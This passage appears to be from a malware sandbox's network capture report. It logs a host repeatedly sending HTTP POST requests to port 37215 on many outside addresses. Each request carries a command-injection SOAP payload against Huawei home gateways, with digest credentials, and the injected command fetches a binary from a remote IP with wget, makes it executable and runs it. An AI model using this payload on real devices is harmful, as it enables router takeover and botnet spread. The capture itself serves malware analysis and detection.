69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  901192.168.2.1340166197.141.100.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.390592098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  902192.168.2.1351636157.15.231.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.390609026 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  903192.168.2.1350886197.146.119.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.390674114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  904192.168.2.1360056115.126.149.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.390674114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  905192.168.2.1352656157.58.32.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.390718937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  906192.168.2.1349566157.155.13.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.390733004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  907192.168.2.135902841.7.56.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.391324043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  908192.168.2.1351530197.189.168.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.391328096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  909192.168.2.1358158157.158.24.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.391346931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  910192.168.2.134200017.181.240.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.391535997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  911192.168.2.1352794197.120.245.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.391555071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
